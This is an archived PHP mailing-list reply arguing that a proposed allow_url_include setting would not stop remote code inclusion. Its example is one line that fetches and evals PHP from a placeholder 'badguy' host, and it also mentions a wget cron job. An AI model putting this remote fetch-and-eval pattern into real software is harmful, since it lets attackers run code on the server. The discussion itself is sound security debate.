Re: allow_url_fopen ini directive not enough

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Kelvin Jones wrote:
> I would like to see a new directive to go alongside "allow_url_fopen" to
> allow people to turn on or off the ability to include/require a remote
> file.
>
> The ability to include and execute a file as php from a remote host
> leaves many applications open to cross-site-scripting attacks.
> This would be easily avoidable if we had a directive
> (allow_url_include?) that by default removed this capability.

Seems kinda pointless to me...

If a Progammer is dumb enough to include/require untrusted source code,
they can just as easily do:

eval(implode('', file('http://example.com/badguy.php')));

after you've turned "OFF" allow_url_include but left allow_url_fopen "ON"

If an attacker is managing to alter your PHP source to pull in his remote
PHP, then the remote PHP feature isn't really all that crucial -- It's
more convenient for them to suck it in from their remote server, perhaps,
or maybe they are worming through a database field that is too short to
hold all their source, so they shove in an "include" -- Still, *any* PHP
code they can execute will eventually give them control anyway.

If an attacker gains access to remote "trusted" source and replaces it,
then your decision to trust that source was faulty -- Which is neither
helped nor hindered by the remote include function, really.  If you needed
that source, you can find a way to get it and have PHP evaluate it, unless
you disable all remote file access completely... Even then, a cron job to
snag it with wget, and an include, and you're back at Square One.

I guess I'm saying that only education and diligence by programmers is
going to avoid this attack.  Turning off only the remote include, but not
remote fopen, won't stop anybody with half a clue for more than 30
seconds.

This is just my take on it, and there could easily be subtle issues or
known exploits you are trying to squash of which I know nothing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux